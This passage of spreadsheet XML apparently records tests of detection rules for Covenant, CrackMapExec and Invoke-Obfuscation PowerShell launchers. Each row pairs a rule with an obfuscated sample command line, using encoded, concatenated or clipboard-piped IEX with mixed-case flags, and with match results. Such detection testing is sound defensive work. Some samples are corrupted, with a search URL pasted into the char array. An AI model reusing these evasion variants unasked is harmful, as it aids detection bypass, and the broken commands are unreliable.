      <c r="H1232" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1232" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1232" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1232" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1233" ht="15.75" customHeight="1" s="42">
      <c r="A1233" s="43" t="n"/>
      <c r="B1233" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1233" s="36" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1233" s="36" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1233" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -E cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1233" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1233" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1233" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1233" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1233" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1234" ht="15.75" customHeight="1" s="42">
      <c r="A1234" s="43" t="n"/>
      <c r="B1234" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1234" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1234" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1234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34" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1234" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1234" s="36" t="n"/>
      <c r="J1234" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1234" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1235" ht="15.75" customHeight="1" s="42">
      <c r="A1235" s="43" t="n"/>
      <c r="B1235" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1235" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1235" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1235" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F1235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1235" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1235" s="43" t="n"/>
      <c r="J1235" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1235" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1236" ht="15.75" customHeight="1" s="42">
      <c r="A1236" s="43" t="n"/>
      <c r="B1236" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1236" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1236" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1236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36" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1236" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1236" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1236" s="43" t="n"/>
      <c r="J1236" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1236" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1237" ht="15.75" customHeight="1" s="42">
      <c r="A1237" s="43" t="n"/>
      <c r="B1237" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1237" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1237" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1237" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F1237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1237" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1237" s="36" t="n"/>
      <c r="J1237" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1237" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1238" ht="15.75" customHeight="1" s="42">
      <c r="A1238" s="43" t="n"/>
      <c r="B1238" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1238" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1238" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1238" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1238" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1238" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1238" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1238" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1238" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1239" ht="15.75" customHeight="1" s="42">
      <c r="A1239" s="43" t="n"/>
      <c r="B1239" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1239" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1239" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1239" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1239" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1239" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1239" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1239" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1239" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1239" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1240" ht="15.75" customHeight="1" s="42">
      <c r="A1240" s="43" t="n"/>
      <c r="B1240" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1240" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1240" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1240" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1240" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1240" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1240" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1240" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1240" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1241" ht="15.75" customHeight="1" s="42">
      <c r="A1241" s="43" t="n"/>
      <c r="B1241" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C1241" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D1241" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E1241" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F1241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1241" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1241" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1241" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1241" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1241" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1242" ht="15.75" customHeight="1" s="42">
      <c r="A1242" s="43" t="n"/>
      <c r="B1242" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1242" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1242" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1242" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1242" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1242" s="43" t="n"/>
      <c r="J1242" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1242" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1243" ht="15.75" customHeight="1" s="42">
      <c r="A1243" s="43" t="n"/>
      <c r="B1243" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1243" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1243" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1243" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1243" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1243" s="36" t="n"/>
      <c r="J1243" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1243" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1244" ht="15.75" customHeight="1" s="42">
      <c r="A1244" s="43" t="n"/>
      <c r="B1244" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1244" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1244" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1244" s="36" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \"iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1244" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1244" s="36" t="n"/>
      <c r="J1244" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1244" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1245" ht="15.75" customHeight="1" s="42">
      <c r="A1245" s="43" t="n"/>
      <c r="B1245" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1245" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1245" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1245" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1245" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1245" s="36" t="n"/>
      <c r="J1245" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1245" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1246" ht="15.75" customHeight="1" s="42">
      <c r="A1246" s="43" t="n"/>
      <c r="B1246" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1246" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1246" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1246" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1246" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1246" s="36" t="n"/>
      <c r="J1246" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1246" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1247" ht="15.75" customHeight="1" s="42">
      <c r="A1247" s="43" t="n"/>
      <c r="B1247" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1247" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1247" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1247" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1247" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1247" s="43" t="n"/>
      <c r="J1247" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1247" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1248" ht="15.75" customHeight="1" s="42">
      <c r="A1248" s="43" t="n"/>
      <c r="B1248" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1248" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1248" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1248" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1248" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1248" s="43" t="n"/>
      <c r="J1248" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1248" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1249" ht="15.75" customHeight="1" s="42">
      <c r="A1249" s="43" t="n"/>
      <c r="B1249" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1249" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1249" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1249" s="36" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \"$c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1249" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1249" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1249" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1249" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1250" ht="15.75" customHeight="1" s="42">
      <c r="A1250" s="43" t="n"/>
      <c r="B1250" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1250" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1250" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1250" s="36" t="inlineStr">
        <is>
          <t>cmd -"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1250" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1250" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1250" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1250" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1250" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1251" ht="15.75" customHeight="1" s="42">
      <c r="A1251" s="43" t="n"/>
      <c r="B1251" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1251" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1251" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1251" s="36" t="inlineStr">
        <is>
          <t>cmd /"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1251" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1251" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1251" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1251" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1252" ht="15.75" customHeight="1" s="42">
      <c r="A1252" s="43" t="n"/>
      <c r="B1252" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1252" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1252" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1252" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1252" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1252" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1252" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1252" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1253" ht="15.75" customHeight="1" s="42">
      <c r="A1253" s="43" t="n"/>
      <c r="B1253" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1253" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1253" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1253" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NOproFilE -COmManD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1253" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1253" s="36" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1253" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1253" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1254" ht="15.75" customHeight="1" s="42">
      <c r="A1254" s="43" t="n"/>
      <c r="B1254" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1254" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1254" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1254" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRofilE -CoMmaNd "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1254" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1254" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1254" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1254" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1255" ht="15.75" customHeight="1" s="42">
      <c r="A1255" s="43" t="n"/>
      <c r="B1255" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1255" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1255" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1255" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfile -CoMMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1255" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1255" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1255" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1255" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1255" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1256" ht="15.75" customHeight="1" s="42">
      <c r="A1256" s="43" t="n"/>
      <c r="B1256" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1256" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1256" s="36" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1256" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMand "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1256" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1256" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1256" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1256" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1257" ht="15.75" customHeight="1" s="42">
      <c r="A1257" s="43" t="n"/>
      <c r="B1257" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1257" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1257" s="36" t="inlineStr">
        <is>
